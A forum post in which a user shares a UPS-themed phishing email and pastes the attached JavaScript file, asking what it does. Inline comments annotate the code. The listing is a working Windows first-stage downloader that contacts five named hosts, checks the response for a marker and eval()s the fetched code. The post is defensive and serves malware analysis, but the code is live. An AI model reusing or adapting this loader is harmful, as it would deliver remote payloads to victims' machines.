I received an email at my work email address that had an attachment. The body looked exactly like this (without the quotes):
“Dear Customer,
We can not deliver your parcel arrived at July 06.
Please check the attachment for details!
Thanks and best regards,
,
UPS Senior Office Manager.”
Now, it’s obviously not a legitimate email from UPS but I was curious what was in the attachment. It was a zip file containing a JavaScript file that was named “UPS-Package-2417924.doc” (the .doc was part of the filename, not the extension). I assume the “.doc” portion was to try to trick me into thinking it was a Word file so that I would open it; on a Windows machine that hides known file extensions, which is the default, only the “.doc” part of the name is displayed.
I’m obviously not going to run this file but I don’t really know much about JavaScript, so I was just curious what this file would’ve done. Here is the code that was in the file:
[CODE]function nomusta(prototu){return prototu.replace(/AA/g,””);} // De-obfuscation helper: deletes every "AA" from its argument; the script stores its telling strings with "AA" spliced in so they do not appear literally in the file.
// NOTE(review): the curly quotes in this listing are a forum formatting artefact; the sample is shown for analysis only.
// zemk: opaque token sent as the query string of every request the loop below makes.
// Part of it resembles a base64url-encoded RSA public key (the "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A" run is the
// usual header of one, and "IDAQAB" the usual exponent) - presumably an identifier plus key material for the
// operator's server; this cannot be confirmed from the script alone.
var zemk = ‘0000001FELhCxJErs1gdVzVBfoPJyaY9fasQovu502397400MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA8Ffp5P7h-_sedxegmVG2HmyNEfZORvOa_FkQShvtOcXD9X9lBgG_Nivk7FWsAVxubHDD5tiwaMl7focgZZ9pSiKN7mA9RFlVmMKjAOCEk0ST5YWBByM0lNCD2sOPMfwDJrhjq9v99mB7Ur0rU6wyI1pClZQWNPfVdQYusKQ6UXp4bWql2HAKH34d2sPrn1cRKrUT3bF0wlo45EKouEzU7bNghbUahhwxRtLKDNLFqVDhOtz-A-CPpq3A34xZHZGkdKVImClOCUk3waXVDZMy4-xME6rQHqgaqMjU2xHin4YMC3xdaFiftzog61JIkg2xuB0mJXfZRHVAd2xUdqQgIQIDAQABLZQA8ZMqYFppY6hfDTF-fbo-4YntQ1d6ffAJaPSXGzXegX2bJyVvSmnEpSpWezH8__PnNoU8WeZndhNl0’;
// ruxk: 32-hex-character marker. The loop only accepts a server response that contains it, and
// replaces each occurrence with the letter "a" before the response is executed.
var ruxk = ‘208f9056fa4a82dd53ca03b3e2468c8f’;
// kiron: index of the host currently being tried.
var kiron = 0;
// x: hosts contacted in order until one answers with a usable response. Each is a network indicator
// for this sample (presumably compromised or attacker-controlled sites - not verifiable from here).
var x = [“expert5.ru”,”serdcezemli.ru”,”blog.3yinaudio.com”,”infosoft.pl”,”bennuakar.com”];
// jacob: only index 1 ('GET') is read by the visible code; the other entries are never used.
var jacob = new Array(‘RESPAN’, ‘GET’, ‘MUSIDO’, ”);
// mustafa: number of hosts in x (the "+0" changes nothing).
var mustafa = x.length+0;
// Thin wrapper that calls send() on the HTTP request object it is given, i.e. actually issues the request.
function zulum(pikue) {pikue.send();}
// Returns "http": the "AA" pairs in "htAAtAAp" are removed by nomusta().
function malysh() {return nomusta(“htAAtAAp”);}
// Thin wrapper around String.split: splits kjg on the separator lki and returns the pieces as an array.
function rizma(kjg, lki) { return kjg.split(lki);}
// Returns "counter" (the "AA" is removed by nomusta()); used as the path component of the request URL.
function greezno() {return nomusta(‘counAAter’);}
// Passes its argument to eval(). In the loop below that argument is text downloaded over plain HTTP,
// so this is the point at which remotely supplied code would execute on the machine.
function hust(gulibator){eval(gulibator);}
// Returns the response body of a completed HTTP request object as text.
function kidok(heruim){return heruim.responseText;}
// Main loop of the downloader: tries each host in x in turn, fetches text from it and, if the text
// passes a simple check, executes it and stops. What the downloaded code does cannot be determined
// from this file; this script is only the first stage.
while(true)
{
// Stop once every host has been tried (kiron is the index, mustafa the host count).
if(kiron>=mustafa)
{
break;
}
try
{
// nomusta() turns the string into "MSXML2.XMLHTTP", the MSXML COM object for HTTP requests.
// ActiveXObject exists only in Windows script hosts (Windows Script Host, Internet Explorer),
// so the script does nothing useful anywhere else.
var fuka = new ActiveXObject(nomusta(“MSXAAML2.XMLHTAATP”));
// !true is simply false; as open()'s third argument it makes the request synchronous.
var ghyt = !true;
var gerlk = x[kiron];
// jacob[3-2] is jacob[1], the GET verb. The URL assembled here has the form
// http://<host>/counter?<zemk> - a useful pattern for proxy or DNS log searches.
fuka.open(jacob[3-2], “”+malysh()+”://”+gerlk+’/’+greezno()+’?’+zemk, ghyt);
zulum(fuka);
// gt holds the response body as text.
var gt = kidok(fuka);
var kimmich = gt.length;
// indexOf() yields -1 when the marker ruxk does not occur in the response.
var miffka = gt.indexOf(ruxk);
var miluoki = “a”+””;
// Accept the response only if it is longer than 1000 characters and contains the marker:
// (8+1+1) * 100 is 1000, "2 == 2" is always-true filler, and miffka + 3 > 2 means miffka >= 0.
if ((kimmich+0) > (8+1+1) * 100 && 2 == 2 && miffka + 3 > 2)
{
// Splitting on the marker and re-joining with "a" replaces every occurrence of the marker
// with the letter "a", so the server's response is not valid script until this step has run.
var gusar = rizma(gt, ruxk).join(miluoki);
// Executes the reconstructed text via eval(), then stops trying further hosts.
hust(gusar);
break;
}
}
catch(e)
{
// Every error (object creation, network failure, error in the evaluated code) is silently
// discarded, and the loop moves on to the next host.
};
kiron++;
};
Can anyone tell me what this file was designed to do? Like I said, I’m not going to run it. I’m just curious what this person was trying to do. Any help is much appreciated. Thanks!